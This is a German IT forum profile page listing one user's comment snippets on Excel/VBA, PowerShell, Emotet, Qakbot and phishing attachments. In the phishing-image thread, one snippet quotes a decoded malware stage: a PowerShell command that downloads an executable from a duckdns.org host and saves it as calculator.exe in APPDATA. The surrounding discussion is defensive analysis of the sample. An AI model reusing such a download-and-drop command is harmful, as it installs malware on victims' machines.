Mitglied: Fennek11

Fennek11

Ich freue mich auf euer Feedback

Facebook, Instagram und Whats App down

Erstellt vor 17 Tagen

Noch ein Hinweis auf das BGP: ISC.sans.edu Als Text: https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/ ...

geschlossen

101

Kommentare

Suche eine gute und einfache Anleitung wie man mit Powershell auf eine API Restschnittstelle zugreift

Erstellt am 16.08.2021

Hallo, hier ein Beispiel um die aktuelle Zeitabzufragen: <code>$url = ' $ret = invoke-restmethod -Uri $url # irm $ret.datetime</code> Ohne 'datetime' sieht man alle ...

8

Kommentare

Phishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)

Erstellt am 23.07.2021

Es ist Base64: $DecodedText = System.Text.Encoding::Unicode.GetString(System.Convert::FromBase64String($b64)) $DecodedText und ergibt nach Entfernen einiger Tabs: invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe” Fehlt da noch etwas? ...

17

Kommentare

Excel Wert aus Zelle "einfrieren"

Erstellt am 10.06.2021

Hallo, den angezeigten Wert erhält man mit cells(1,1).Text mfg ...

gelöst

6

Kommentare

Excel Performance in großen Tabellen optimieren?

Erstellt am 26.05.2021

100.000 Zeilen sollten Excel nicht sonderlich belasten, 10.000 Formeln können das sehr wohl. Algemeine Ideen zur Beschleunigung: - keine ganze Spalten in Formels - ...

6

Kommentare

Subexpressions in der Powershell

Erstellt am 25.03.2021

Danke ...

12

Kommentare

Exchange-Hack (2021-03) war Angriff erfolgreich? Was dann?

Erstellt am 09.03.2021

Die Schwachstelle im "ExChange" gab es wohl schon lange (10 Jahre +) und wurde Microsoft am 2. Januar 2021 gemeldet. In den 2 Monaten ...

95

Kommentare

Einer Malware auf der Spur. Benötige Sherlock Holmes!

Erstellt am 01.03.2021

Versuch die DoItYourself-Methode: Prüfe - Autostart - den Ordner %Temp% - den Ordner C:\programdate - die Ordner in c:\users\public - windows kann alle DNS-Queries ...

gelöst

10

Kommentare

Word, Excel, PDF Dateien Personalisieren: öffnen, bearbeiten nur auf Firmen PCs

Erstellt am 25.02.2021

Hallo, es ist zwar möglich solche Sperren per VBA einzubauen, aber da mit einem Tastendruck VBA beim Öffnen abgeschaltet werden kann, ist es "völlig ...

gelöst

9

Kommentare

EXCEL Werte des Tabellenfilter als Liste ausgeben lassen

Erstellt am 11.02.2021

Vielleicht geht es, aber ein einfacher Weg ein 'unique' Liste zu erhalten ist der Spezial-Filter. Danach zu sortieren ist kein Problem. ...

3

Kommentare

Emotet angeblich unschädlich gemacht

Erstellt am 27.01.2021

Noch ein paar Details: ...

17

Kommentare

Emotet durch BKA zerschlagen

Erstellt am 27.01.2021

Viele MS-Malware Familien nutzen "WScript.Shell", das aber von vielen Anti-Viren-Programmen geblockt wird. Emotet startet PowerShell aber anderst, das ging vor wenigen Wochen noch durch. ...

3

Kommentare

Emotet angeblich unschädlich gemacht

Erstellt am 27.01.2021

Einen eher ausführlichen Artikel gibt es hier: ...

17

Kommentare

Emotet angeblich unschädlich gemacht

Erstellt am 27.01.2021

Es gibt seit Jahren eine Gruppe, die täglich alle Daten zu Emotet sammelt und veröffentlicht: Auf Twitter gibt es keine Meldung: ...

17

Kommentare

BATCH: Dateibesitzer mit kopieren

Erstellt am 26.01.2021

Hallo, vor kurzem habe ich einen Code gefunden (und nicht getestet), der den Besitzer einer Datei ausgeben soll. Es ist ein VBA-Code. Kannst Du ...

6

Kommentare

Tja, so kanns kommen

Erstellt am 20.01.2021

Haben sie Interesse an IT-Security? Da gibt es jeden Tag etwas neues. ...

5

Kommentare

TXT Datei verschieben wenn Datum drinnen steht

Erstellt am 15.01.2021

Der Code sucht das aktuelle Datum in der ersten Zeile: Die folgenden Aktionen müssen noch ergänzt werden, bzw aus den anderen Beiträgen übernommen werden. ...

gelöst

6

Kommentare

WAN IPs der ISPs auf Wohnorte getrackt?

Erstellt am 10.01.2021

Wenn Du nach "GeoIP" googlest, solltest Du viele Treffer erhalten: Sowohl bei Facebook in den Einstellungen als auch bei "www.weather.com" (F12: Netzwerk) siehst Du, ...

gelöst

38

Kommentare

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Falls Emotet gestartet wurde, wird -vermutlich- eine dll ins $HOME-Directory geschrieben, also c:\users\-eigenerName- Zur Vorsicht sollte auch %temp% und c:\programData geprüft werden. Palawer: Einem ...

24

Kommentare

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Ok. Emotet greift die EMail - Kontakte ab und verschickt malware an diese Adressen. Es könnte Sinn machen die Geschäftspartner zu warnen. ...

24

Kommentare

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Wenn man den ersten Base64 string dekodiert, gibt es: ?WVs und Sachstandsanfragen machen alle RAe und RAin künftig selbst Macht das Sinn? ...

24

Kommentare

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Ja, eindeutig malware: ein Trojaner Da ich kein Konto bei Virustotal habe, kann ich keine weiteren Infos, z.B. die Familie erkennen. Versuche so gut ...

24

Kommentare

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Ist es eine malware? Zum Vergleich: Palo-Alto-malware Analyse Prüfe versichtig den Anhang, am besten unter Linux, bzw lade die Datei unzipped bei www.Virustotal.com hoch. ...

24

Kommentare

SolarWinds-Produkte mit SunBurst-Backdoor

Erstellt am 14.12.2020

FireEye hat IoC für die gestohlenen Offensive tools veröffentlicht: FireEye Auch wenn ich dort keinen link zu einer "weaponized" MS-Word-Datei gefunden habe, auf youtube, ...

24

Kommentare

Daten aus PDF auslesen und per VBA in Excel schreiben

Erstellt am 17.11.2020

Hallo, ohne Zusatz-Programme kann wohl nur O365 pro direkt PDF lesen. Also entweder ein Versuch mit M$ Word oder einem externen Programm zuerst eine ...

6

Kommentare

Ethical Hacking (CEHv10) - Der umfassende Kurs - Lohnt sich der Kurs für einen Fisi?

Erstellt am 12.11.2020

Hallo, wenn es um Lernen und nicht den Erwerb von Zertifikaten geht, sieh die ein paar der Youtube-videos von Hackersploit an. M.M.n. wird bei ...

gelöst

7

Kommentare

Mittels .bat Datei Excel makro an mehreren Datein ausführen

Erstellt am 06.11.2020

Workbook.Open(Pfad & file) also (ungeprüft) ...

10

Kommentare

Mittels .bat Datei Excel makro an mehreren Datein ausführen

Erstellt am 06.11.2020

Solange es nur 1 Unterordner-Ebene gibt, ist das mit FSO recht einfach zu machen. (Viele AV blockieren CreateObject("WScrip.Shell").excec("cmd dir /s c:\temp\*.xls?").stdout.readall Für alternative rekursive ...

10

Kommentare

Mittels .bat Datei Excel makro an mehreren Datein ausführen

Erstellt am 05.11.2020

Hallo, viele Dateien in einem Ordner zu bearbeiten, geht in VBA nach diesem Schema: Im Format xlsx wird ohne VBA gespeichert mfg ...

10

Kommentare

Werte in Dateieigenschaften "Titel", "Betreff", "Markierungen", "Kommentare" einfügen Datenquelle Excel-Tabelle

Erstellt am 26.10.2020

Mit Powershell kann man zwar die Metadaten ändern (auch Aufnahmezeit), aber keine neue hinzufügen. Das geht aber mit VBA, passt also besser zu Excel: ...

3

Kommentare

Werte in Dateieigenschaften "Titel", "Betreff", "Markierungen", "Kommentare" einfügen Datenquelle Excel-Tabelle

Erstellt am 26.10.2020

Hallo, hier ein Ansatz mit Powershell: Den Schreibzugriff müßtest Du suchen. Eine einfache Variante zum Auslesen: mfg ...

3

Kommentare

Emotet: viele Worte auf einer Seite

Erstellt am 21.10.2020

Z.Zt. gibt es sehr viele "Qakbot"-malware. In der xlsb-Variante versagt "ClamAV" und fast alle Anti-Viren-Programme, da "nur" ein Macro4-Sheet enthalten ist. Erkennbar ist es ...

3

Kommentare

MS-Office-Viren

Erstellt am 13.10.2020

Alle, die im Bereich IT-Security aktiv sind, kennen Virustotal.com uä. Meine Quelle werde ich nur regelmäßigen Forums-User (Level-2 ) per PN mitteilen, da man ...

7

Kommentare

MS-Office-Viren

Erstellt am 13.10.2020

Gute Frage! Es liegt in der Natur der Sache, dass ich nicht einfach eine Schadware starte. Aber ich habe den Aufruf "Set Shl = ...

7

Kommentare

Was ist die Logik hinter solchen Webseitenaufrufen c6248f04ox148.edu ?

Erstellt am 03.10.2020

Nach einigen Analysen der malware "Emotet": Dort werden auf gehackten Seiten mit solchen zufälligen Pfadnamen die exe-Dateien abgelegt. Ein einfacher Test die Seite mit ...

5

Kommentare

Emotet: docx mit VBA und Powershell

Erstellt am 21.08.2020

Ich hbe noch einmal nachgesehen und nur einen, aber sehr detaillierten link gefunden. Deshalb hier nur ein aktuelles Bild: ...

15

Kommentare

Emotet: docx mit VBA und Powershell

Erstellt am 21.08.2020

Es hat jetzt nichts mit Emotet, aber mit O3665 zu tun: Ein recht detaillierter Incedenz-Report, es kann auch Experten treffen: ...

15

Kommentare

Emotet: docx mit VBA und Powershell

Erstellt am 21.08.2020

Die Aussagen von MS zu docx und docm sind weithin bekannt. Aber die Crooks, z.B. bei Emotet haben einen Weg herum gefunden. Aus dem ...

15

Kommentare

Emotet: docx mit VBA und Powershell

Erstellt am 21.08.2020

Kein Scherz: Teste doch einmal den E-Mail-Filter mit einer selbst gemachten DOCX mit VBA. Aus dem Powershell-Code kann man das -mit etwas Phantasie- erkennen. ...

15

Kommentare

Emotet: docx mit VBA und Powershell

Erstellt am 21.08.2020

Macht es Sinn alle docx zu blocken, wenn einmal die Woche ein Virus dabei sein könnte? Die Änderunge,die notwendig sind, in eine docx VBA ...

15

Kommentare
12 >